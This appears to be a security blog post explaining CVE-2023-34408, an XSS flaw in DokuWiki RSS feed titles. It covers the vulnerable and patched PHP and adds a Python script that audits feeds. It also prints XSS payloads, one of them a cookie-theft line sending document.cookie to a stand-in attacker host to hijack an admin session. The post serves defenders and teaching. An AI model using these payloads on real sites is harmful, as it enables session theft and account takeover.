CVE-2023-34408 - Exploiting XSS in DokuWiki RSS Feeds—How Attackers Can Inject Malicious Scripts (Full Details & Example)

---

DokuWiki is a widely used open-source wiki platform, popular for its easy setup and flat-file storage. But just like any web application, it’s important to keep an eye on security. In this deep-dive, we take a closer look at CVE-2023-34408—a vulnerability that allows Cross-Site Scripting (XSS) through RSS feed titles in DokuWiki versions before 2023-04-04a. You’ll learn what’s going on, how it can be exploited, and see some code snippets for better understanding.

What is CVE-2023-34408?

This vulnerability targets how DokuWiki generates RSS feeds. Specifically, if a wiki page or change log entry contains unsanitized HTML (such as <script> tags) in its title, that content ends up inside the RSS feed. If someone views the RSS feed using a browser or a client that executes JavaScript, the script will run in the user’s context—classic XSS (Cross-Site Scripting).

Attack Vector

Let’s say an attacker can edit or create new wiki pages (such as on a public or poorly protected DokuWiki install, or even through social engineering/compromised accounts).

1. They insert malicious content into a page title, for example by adding a script tag.

2. The RSS feed is generated, including the malicious title, without proper escaping or sanitization.

Suppose an attacker creates a new page and sets its title to this:

```html
<script>alert('XSS in DokuWiki RSS!');</script>
```

Or, using character encoding to try to bypass naïve filters:

```html
"><script>alert('XSS');</script>
```

The section responsible for generating RSS titles looked like this (simplified example):

```php
// Vulnerable version: No escaping
$output .= '<title>' . $pageTitle . '</title>';
```

If $pageTitle contains HTML tags or scripts, they are output as-is.

The resulting RSS might look like this (trimmed for clarity):

```xml
<item>
  <title><script>alert('XSS in DokuWiki RSS!');</script></title>
  <link>https://wiki.example.com/doku.php?id=malicious_page</link>
</item>
```

4. Exploitation

- Victim opens the RSS feed (for example, https://wiki.example.com/feed.php).

- The script executes in their browser, performing any actions as the logged-in user.

Attack Impact: An attacker can steal cookies, impersonate users, or modify wiki content.

Step 1: Create a wiki page with this as the title:

```html
"><script>fetch('https://evil.example.com?cookie='+document.cookie)</script>
```

Step 2: Wait for an admin to preview the RSS feed. When they do, the script fires and their session cookie is sent to the attacker’s server—full session hijack achieved.

Patch & Fix

The DokuWiki developers addressed this in version 2023-04-04a. They now escape or strip dangerous content in RSS title fields.

Fixed code example:

```php
// Safe version: escape XML special characters (including quotes) for the RSS/XML context
$output .= '<title>' . htmlspecialchars($pageTitle, ENT_XML1 | ENT_QUOTES, 'UTF-8') . '</title>';
```
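To confirm that a feed really is escaped after upgrading, you can audit a saved copy of the `feed.php` output. The script below is an added example, not DokuWiki code; the function names and the three sample feeds are constructed for illustration.

```python
import xml.etree.ElementTree as ET

def local(tag):
    """Strip an XML namespace prefix: '{ns}title' -> 'title'."""
    return tag.rsplit("}", 1)[-1]

def audit_feed_titles(feed_xml):
    """Return findings for <title> elements that carry raw markup.

    A correctly escaped title is pure text. Any child element inside
    <title> means markup from a page title reached the feed unescaped.
    """
    # Refuse DTDs so a hostile feed cannot trigger entity expansion.
    if "<!DOCTYPE" in feed_xml.upper():
        return ["feed declares a DOCTYPE; refusing to parse"]
    try:
        root = ET.fromstring(feed_xml.strip())
    except ET.ParseError as exc:
        # Unbalanced raw tags in a title break well-formedness entirely.
        return [f"feed is not well-formed XML ({exc}); check titles for raw '<'"]
    findings = []
    for elem in root.iter():
        if local(elem.tag) != "title":
            continue
        children = [local(c.tag) for c in elem.iter() if c is not elem]
        if children:
            findings.append("title contains raw element(s): " + ", ".join(children))
    return findings

# Constructed sample feeds (not real DokuWiki output).
VULN_FEED = """<rss version="2.0"><channel><title>Example Wiki</title>
<item><title><script>alert('XSS in DokuWiki RSS!');</script></title>
<link>https://wiki.example.com/doku.php?id=malicious_page</link></item>
</channel></rss>"""

FIXED_FEED = """<rss version="2.0"><channel><title>Example Wiki</title>
<item><title>&lt;script&gt;alert('XSS in DokuWiki RSS!');&lt;/script&gt;</title>
<link>https://wiki.example.com/doku.php?id=malicious_page</link></item>
</channel></rss>"""

BROKEN_FEED = "<rss><channel><item><title><b>bold title</title></item></channel></rss>"

if __name__ == "__main__":
    for name, feed in [("vulnerable", VULN_FEED), ("fixed", FIXED_FEED), ("broken", BROKEN_FEED)]:
        print(name, "->", audit_feed_titles(feed) or "titles are text-only")
```

An empty result only shows that titles are text at the XML layer; it says nothing about how a particular feed reader renders that text afterwards.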

Conclusion

Even one unsanitized line can open the door to serious attacks—demonstrated perfectly by CVE-2023-34408. If you use DokuWiki, staying up to date isn’t just routine maintenance—it’s critical security hygiene.

### More Info / Resources

- GitHub Security Advisory
- Official DokuWiki Download Page (for updates)
- About Cross-Site Scripting (OWASP)

Stay safe, and always sanitize inputs—especially in places you’d least expect!

Timeline

Published on: 06/05/2023 02:15:00 UTC
Last modified on: 06/09/2023 18:44:00 UTC